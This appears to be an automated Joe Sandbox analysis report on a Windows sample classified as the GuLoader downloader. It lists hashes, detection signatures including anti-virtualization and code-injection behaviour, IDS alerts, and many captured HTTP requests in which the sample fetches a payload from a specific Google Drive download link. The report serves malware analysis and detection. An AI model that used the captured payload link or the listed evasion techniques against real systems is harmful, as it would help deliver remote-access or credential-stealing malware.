Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ME-SPC-94.03.60.175.07.exe

Overview

General Information

Sample name:ME-SPC-94.03.60.175.07.exe
Analysis ID:1576273
MD5:23f5026ef6b69b601f982f0498e02ddb
SHA1:4fd5aa90b343ca1061992256ae2de8498bc64575
SHA256:be145da99fd91764709334306a81e69f35a06684c37f00249cd170d1f29c12f0
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ME-SPC-94.03.60.175.07.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe" MD5: 23F5026EF6B69B601F982F0498E02DDB)
    • ME-SPC-94.03.60.175.07.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe" MD5: 23F5026EF6B69B601F982F0498E02DDB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.3137684124.0000000005DE6000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000002.1471777576.0000000009256000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-16T18:05:44.396851+010028032702Potentially Bad Traffic192.168.2.749751172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: ME-SPC-94.03.60.175.07.exeReversingLabs: Detection: 55%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: ME-SPC-94.03.60.175.07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49896 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49903 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49932 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: ME-SPC-94.03.60.175.07.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004057D0
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_0040628B FindFirstFileW,FindClose,4_2_0040628B
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_00402770 FindFirstFileW,8_2_00402770
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49751 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
